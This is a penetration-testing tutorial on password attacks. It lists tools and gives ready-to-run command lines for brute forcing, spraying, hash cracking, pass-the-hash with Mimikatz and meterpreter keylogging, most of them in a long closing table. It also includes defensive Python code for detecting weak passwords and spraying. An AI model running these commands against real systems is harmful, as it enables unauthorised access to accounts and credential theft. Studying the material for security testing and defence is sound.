Password Attacks


1. Introduction to Password Attacks

Password attacks aim to uncover valid credentials by exploiting weaknesses in how passwords are chosen, stored, or managed. They succeed most often against weak passwords, poor hashing or storage practices, or unpatched systems.

2. Common Types of Password Attacks

a. Brute Force Attack

  • Description: Attempts every possible combination of characters to guess the password.

  • Tools: Hydra, John the Ripper, Hashcat.

  • Pros & Cons: Guaranteed to find the password eventually, but the search space grows exponentially with length, so it is practical only for short or simple passwords.

  • Command Example:

    hydra -l user -P /path/to/wordlist.txt <target_IP> ssh

b. Dictionary Attack

  • Description: Uses a predefined list of likely passwords to attempt matches.

  • Tools: Hashcat, Medusa, John the Ripper.

  • Pros & Cons: Faster than brute force but limited by the quality of the dictionary.

  • Resources for Wordlists:

c. Hybrid Attack

  • Description: Combines dictionary words with character variations, like appending numbers or symbols.

  • Tools: Hashcat with hybrid mode, John the Ripper.

  • Pros & Cons: Effective against passwords built on predictable patterns (a word plus a year or symbol), at the cost of a larger candidate set than a plain dictionary.

  • Command Example:

    hashcat -a 6 -m <hash_type> <hash_file> /path/to/wordlist.txt ?d?d?d?d
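The hybrid attack works because users mutate a dictionary word in a handful of predictable ways: capitalising it, swapping letters for look-alike digits, and appending a year or symbol. The defensive counterpart is a password policy check that undoes those mutations and rejects anything that collapses back to a dictionary word. The following is an added example written for this page, not code from any of the tools above; the word list, the substitution table and the function names are constructed for illustration, and a real deployment would load a large breached-password list instead.

```python
import re

# Constructed sample dictionary; a real check loads a large wordlist (e.g. a breach corpus).
BASE_WORDS = {"password", "welcome", "summer", "dragon", "letmein", "company"}

# Common look-alike substitutions that a hybrid/rule attack tries (constructed table).
LEET_MAP = str.maketrans({
    "0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
    "@": "a", "$": "s", "!": "i",
})


def normalize(candidate: str) -> str:
    """Undo the mutations a hybrid attack applies: case, leading/trailing digits or symbols, leet substitutions."""
    core = candidate.lower()
    core = re.sub(r"[\d\W_]+$", "", core)   # strip trailing "2024!", "123", "!!"
    core = re.sub(r"^[\d\W_]+", "", core)   # strip leading digits/symbols too
    return core.translate(LEET_MAP)


def hybrid_weakness(candidate: str, base_words=BASE_WORDS):
    """Return the dictionary word the candidate is built from, or None if no hybrid pattern is found."""
    core = normalize(candidate)
    return core if core in base_words else None


def check_password(candidate: str, min_length: int = 12) -> list:
    """Return a list of policy findings; an empty list means the password passed."""
    findings = []
    if len(candidate) < min_length:
        findings.append(f"too short ({len(candidate)} < {min_length})")
    base = hybrid_weakness(candidate)
    if base is not None:
        findings.append(f"dictionary word '{base}' with predictable mutations")
    return findings


if __name__ == "__main__":
    for pw in ("Summer2024!", "P@ssw0rd123", "Dr4g0n!!", "correct-horse-battery"):
        print(pw, "->", check_password(pw) or "OK")
```

A password such as "P@ssw0rd123" satisfies a naive complexity rule (upper, lower, digit, symbol) yet normalises to "password" in one step, which is exactly the candidate a `-a 6` run with a short digit mask produces early. Checking the normalised form at enrolment removes that class before it reaches the attacker.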

d. Rainbow Table Attack

  • Description: Uses precomputed tables of hashed passwords to quickly find matches.

  • Tools: Rainbow Crack, Ophcrack.

  • Pros & Cons: Very fast if the table matches the hashing algorithm, but requires significant storage and is defeated by per-password salts, which make precomputation impractical.

  • Rainbow Table Resources:

e. Credential Stuffing

  • Description: Reuses breached username-password pairs across multiple accounts.

  • Tools: Sentry MBA, Snipr, OpenBullet.

  • Pros & Cons: Effective against users who reuse passwords but limited by the availability of breached data.

  • Resources for Credential Dumps:

f. Password Spraying

  • Description: Attempts a few common passwords across many accounts to avoid account lockouts.

  • Tools: CrackMapExec, Ruler, Spraying Toolkit.

  • Pros & Cons: Effective against organizations with weak password policies but can be detected by activity monitoring.
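The monitoring signal that gives password spraying away is the shape of the failures, not their count: one source fails once against many different accounts, whereas a brute-force attempt fails many times against one account. The detector below is an added example written for this page, not part of any tool listed here; the log format, the source addresses, the usernames and the thresholds are constructed for illustration and would be replaced by the real authentication log schema and tuned values in production.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon events (timestamp, source IP, target username); not real logs.
SAMPLE_FAILURES = """\
2024-05-01T09:00:01 203.0.113.10 alice
2024-05-01T09:00:03 203.0.113.10 bob
2024-05-01T09:00:05 203.0.113.10 carol
2024-05-01T09:00:07 203.0.113.10 dave
2024-05-01T09:00:09 203.0.113.10 erin
2024-05-01T09:00:11 203.0.113.10 frank
2024-05-01T09:00:02 198.51.100.7 alice
2024-05-01T09:00:04 198.51.100.7 alice
2024-05-01T09:00:06 198.51.100.7 alice
2024-05-01T09:00:08 198.51.100.7 alice
2024-05-01T09:00:10 198.51.100.7 alice
2024-05-01T09:00:12 198.51.100.7 alice
2024-05-01T09:30:00 192.0.2.5 alice
"""


def parse_failures(text):
    """Parse 'timestamp source user' lines into (datetime, source, user) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user = line.split()
        events.append((datetime.fromisoformat(ts), src, user))
    return events


def classify_sources(events, window=timedelta(minutes=10), min_failures=5, spray_ratio=0.8):
    """Slide a time window over each source's failures and label the pattern.

    Many distinct users in the window -> spraying; repeated failures on one or two users -> brute force.
    Sources that never reach min_failures inside a window are not reported."""
    by_src = defaultdict(list)
    for ts, src, user in sorted(events):
        by_src[src].append((ts, user))
    verdicts = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            if len(win) < min_failures:
                continue
            distinct = len({u for _, u in win})
            if distinct / len(win) >= spray_ratio:
                verdicts[src] = "password spraying"
            elif distinct <= 2:
                verdicts[src] = "brute force on a single account"
            else:
                verdicts[src] = "mixed credential guessing"
            break  # first qualifying window decides the label for this source
    return verdicts


def detect(log_text):
    return classify_sources(parse_failures(log_text))


if __name__ == "__main__":
    for src, verdict in detect(SAMPLE_FAILURES).items():
        print(f"{src}: {verdict}")
```

Per-source grouping is the simplest cut; a spray distributed across many source addresses is caught by the mirror-image query (count distinct accounts failing with the same rare timing or the same user agent) or by aggregating failures per target account across the whole tenant.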

3. Password Attack Tools

a. John the Ripper

  • Description: One of the most popular open-source password cracking tools.

  • Capabilities: Supports many hashing algorithms, custom rules, and has a wide range of cracking modes.

b. Hashcat

  • Description: A high-performance password cracker optimized for GPU processing.

  • Capabilities: Supports multiple attack modes and advanced rules.

  • Resources: Hashcat Wiki

c. Hydra

  • Description: A fast network login cracker for numerous protocols (SSH, FTP, HTTP, etc.).

  • Capabilities: Brute-forcing and dictionary attacks across various protocols.

d. Medusa

  • Description: A versatile brute-forcing tool that supports many protocols.

  • Capabilities: Known for its speed and flexibility.

e. CrackMapExec

  • Description: A Swiss Army knife for pentesters that supports spraying, brute-forcing, and exploitation.

  • Capabilities: Integrated with Metasploit for extensive password attacks on Windows.

f. Ophcrack

  • Description: Uses rainbow tables for cracking Windows LM and NTLM hashes.

  • Capabilities: Specialized in Windows passwords.


4. Specialized Password Attack Techniques

a. Man-in-the-Middle (MitM) Attacks

  • Description: Intercepts passwords as they travel over the network; works only where the protocol sends credentials in clear text or with weak protection.

  • Tools: Ettercap, MITMf, Bettercap.

b. Pass-the-Hash

  • Description: Authenticates with a captured NTLM hash instead of the plaintext password; NTLM challenge-response only needs the hash, so no cracking is required.

  • Tools: Mimikatz, Pass-the-Hash Toolkit.

  • Resources: Mimikatz GitHub

c. Keylogging and Malware

  • Description: Captures keystrokes to retrieve passwords directly from user input.

  • Tools: Metasploit (keylogger payloads), Cobalt Strike.

  • Pros & Cons: Effective, but requires malware delivery and installation.

d. Phishing and Social Engineering

  • Description: Tricking users into revealing their passwords via fake login pages or deceptive requests.

  • Tools: Gophish, SET (Social Engineering Toolkit).

  • Resources: Gophish GitHub


5. Hash Cracking Techniques and Tools

a. NTLM and LM Hash Cracking

  • Tools: Cain and Abel, Ophcrack.

  • Command Example:

    john --format=NT hashfile

b. SHA-1 and SHA-256 Cracking

  • Tools: Hashcat, John the Ripper.

  • Command Example:

    hashcat -m 100 hashfile /path/to/wordlist.txt

c. PBKDF2 and bcrypt Cracking
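Sections 2d and 5c meet at one point: a precomputed table only helps when the stored digest is a pure function of the password, and a per-user salt breaks that, while an iterated KDF such as PBKDF2 or bcrypt makes even the salted online attack expensive. The following is an added example written for this page, not code from Hashcat, John or any other tool named above; the word list is constructed, the storage format is a hypothetical `algo$iterations$salt$digest` string, and the low iteration count in the demo exists only to keep the run short.

```python
import hashlib
import hmac
import os

# Constructed miniature wordlist standing in for a real breach corpus.
WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon"]


def build_lookup_table(words):
    """Precompute unsalted MD5 -> plaintext. A rainbow table uses hash chains to shrink
    this table, but the precondition is the same: no salt in the stored digest."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def reverse_unsalted(table, digest_hex):
    """Table lookup: succeeds only if the digest was computed without a salt."""
    return table.get(digest_hex)


def store_pbkdf2(password, iterations=600_000):
    """Salted, iterated storage (hypothetical 'algo$iters$salt$digest' format)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo(iterations=1_000):
    """Show the table hitting an unsalted MD5 and missing a salted PBKDF2 digest."""
    table = build_lookup_table(WORDLIST)
    unsalted = hashlib.md5(b"letmein").hexdigest()
    hit = reverse_unsalted(table, unsalted)            # 'letmein'
    stored = store_pbkdf2("letmein", iterations)
    miss = reverse_unsalted(table, stored.split("$")[-1])  # None: digest depends on a random salt
    return hit, miss, verify_pbkdf2("letmein", stored), verify_pbkdf2("dragon", stored)


if __name__ == "__main__":
    print(demo())
```

The salt does not make the password stronger; it forces the attacker to redo every guess per account, and the iteration count sets how much each guess costs. That is why the hashcat modes for bcrypt or high-iteration PBKDF2 run orders of magnitude slower than `-m 1000` (NTLM) or `-m 100` (SHA-1), and why storing those is the mitigation for the attacks in sections 2b through 2d.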


6. Guides and Resources for Further Learning


Conclusion

This extensive look at password attacks illustrates the variety of tools and techniques available to an attacker and how each method can be mitigated with strong security practices. In practice, penetration testers should select methods based on target context, password strength, and network defenses. As password attacks continue to evolve, regularly reviewing and updating this knowledge with new tools and methods will ensure a strong foundation in penetration testing and cybersecurity.

Below is a comprehensive table of common password attack vectors, primary tools used for each, and example usages. This will provide an extensive reference list for various attack techniques, covering both standard and specialized tools.

Attack Vector | Primary Tool | Example Usage
------------- | ------------ | -------------
Brute Force | Hydra | hydra -l user -P /path/to/wordlist.txt <target_IP> ssh
Dictionary Attack | John the Ripper | john --wordlist=/path/to/wordlist.txt hashfile
Hybrid Attack | Hashcat | hashcat -a 6 -m 1000 hashfile /path/to/wordlist.txt ?d?d?d?d
Rainbow Table Attack | Ophcrack | ophcrack -t <rainbow-table-dir> -f hashfile
Credential Stuffing | Snipr | Uses breach lists for multi-account testing
Password Spraying | CrackMapExec | crackmapexec smb <target_IP> -u users.txt -p common-passwords.txt
Keylogging Attack | Metasploit | meterpreter > keyscan_start
Phishing | Gophish | Set up phishing campaign targeting email credentials
Pass-the-Hash | Mimikatz | sekurlsa::pth /user:Admin /domain:domain /ntlm:<NTLM_HASH> /run:powershell.exe
Hash Cracking (NTLM) | Hashcat | hashcat -m 1000 hashfile /path/to/wordlist.txt
Hash Cracking (bcrypt) | John the Ripper | john --format=bcrypt hashfile
LM Hash Cracking | Cain and Abel | Load hashes and run automated cracking
SSH Brute Force | Hydra | hydra -l root -P passwords.txt ssh://<target_IP>
HTTP Basic Auth Brute Force | Medusa | medusa -h <target_IP> -U users.txt -P passwords.txt -M http
FTP Brute Force | Hydra | hydra -l anonymous -P passwords.txt ftp://<target_IP>
SMB Password Attack | CrackMapExec | crackmapexec smb <target_IP> -u admin -p passwords.txt
SQL Database Password Cracking | SQLMap | sqlmap -u <URL> --crack --passwords
WPA2 Wi-Fi Cracking | aircrack-ng | aircrack-ng -w /path/to/wordlist.txt <capture-file>
Email Phishing with Spoofed Links | SET (Social-Engineer Toolkit) | Phishing module setup targeting email collection
Reverse Brute Force | Hydra | hydra -L usernames.txt -p commonpassword <target_IP> ssh
Multi-Protocol Password Testing | Medusa | Supports SMB, HTTP, FTP, Telnet, etc.
Telnet Brute Force | Hydra | hydra -l root -P passwords.txt telnet://<target_IP>
RDP Brute Force | Hydra | hydra -l Administrator -P passwords.txt rdp://<target_IP>
Cisco Router Cracking | Ncrack | ncrack -p 23 --user root --pass passwords.txt <target_IP>
DNS Zone Transfer Attempt | nslookup | nslookup -type=any -query=AXFR <target_domain>
LDAP Password Attack | Medusa | medusa -h <target_IP> -u user -P passwords.txt -M ldap
Telnet Credential Guessing | Hydra | hydra -l admin -P passwords.txt telnet://<target_IP>
SNMP Community String Brute Force | Onesixtyone | onesixtyone -c community-strings.txt <target_IP>
OpenVPN Brute Force | Hydra | hydra -l user -P passwords.txt openvpn://<target_IP>
Apache Tomcat Manager Brute Force | Hydra | hydra -l admin -P passwords.txt http-get://<target_IP>:8080/manager/html
XMPP Brute Force | Hydra | hydra -l user -P passwords.txt xmpp://<target_IP>
SIP/VoIP Credential Guessing | Svmap | Scans for SIP servers and attempts weak password logins
Oracle DB Password Attack | ODAT | odat passwordguesser -s <target_IP> -U usernames.txt -P passwords.txt
MSSQL Password Cracking | Hydra | hydra -l sa -P passwords.txt mssql://<target_IP>
Kerberos TGT Brute Forcing | Kerbrute | kerbrute bruteuser -d domain.com passwords.txt <username>
RADIUS Brute Force | Medusa | medusa -h <target_IP> -u user -P passwords.txt -M radius
MongoDB Password Attack | Hydra | hydra -l user -P passwords.txt mongodb://<target_IP>
Redis Unauthorized Access Check | Nmap | nmap -p 6379 --script redis-brute <target_IP>
MacOS Keychain Exploit | Metasploit | Post-exploitation module in meterpreter for keychain access
VNC Password Brute Force | Hydra | hydra -P passwords.txt vnc://<target_IP>
VoIP/SIP Password Cracking | Hydra | hydra -L users.txt -P passwords.txt sip://<target_IP>
Bitcoin Wallet Brute Force | btcrecover | Uses known wallet details to attempt password recovery
Azure AD Password Spraying | MSOLSpray | python3 MSOLSpray.py -u users.txt -p Password123
Office365 Credential Testing | AADInternals | Uses PowerShell to enumerate and test credentials
ZIP File Password Cracking | fcrackzip | fcrackzip -u -D -p /path/to/wordlist.txt <file.zip>
PDF Password Cracking | pdfcrack | pdfcrack -f <file.pdf> -w /path/to/wordlist.txt
RAR File Password Cracking | RarCrack | rarcrack <file.rar> --type rar --dictionary /path/to/wordlist.txt
Network Share Password Cracking | CrackMapExec | crackmapexec smb <target_IP> -u usernames.txt -p passwords.txt


This table should give a thorough understanding of various password attack vectors, tools, and sample commands to use. For each method, there are nuances to configurations and optimizations, so consulting tool-specific documentation and adjusting commands to your target environment can maximize effectiveness.
